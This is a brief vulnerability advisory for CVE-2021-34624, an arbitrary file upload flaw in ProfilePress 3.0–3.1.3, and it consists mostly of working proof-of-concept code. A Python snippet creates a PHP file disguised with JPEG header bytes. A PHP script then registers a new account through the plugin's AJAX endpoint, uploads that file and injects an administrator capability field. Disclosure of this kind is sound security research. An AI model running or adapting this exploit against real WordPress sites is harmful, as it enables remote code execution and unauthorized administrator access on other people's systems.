ProfilePress 3.0 – 3.1.3 – Arbitrary File Upload in File Uploader Component | CVE 2021-34624

Description

There is functionality in the plugin to add file uploads to user registrations and profile updates that had no file type checking in place making it possible for arbitrary files to be uploaded.

Proof of Concept

fh = open('shell.php', 'wb')
fh.write(b'\xFF\xD8\xFF\xE0' + b'<?php phpinfo(); ?>')
fh.close

<?php

// Settings
$wp_url = $argv[1];
$file = $argv[2];

// Update Settings
$ch = curl_init();
$cFile = curl_file_create( realpath( $file ) );
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'reg_username' => 'Hax0r',
    'reg_email' => 'Hax0r@Hax0r.com',
    'reg_password' => 'password',
    'reg_password_present' => 'true',
    'reg_first_name' => 'Hax0r',
    'reg_last_name' => 'hack',
    'wp_capabilities[administrator]' => '1',
    'action' => 'pp_ajax_signup',
    'melange_id' => '',
    'files' => $cFile,
]);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);

?>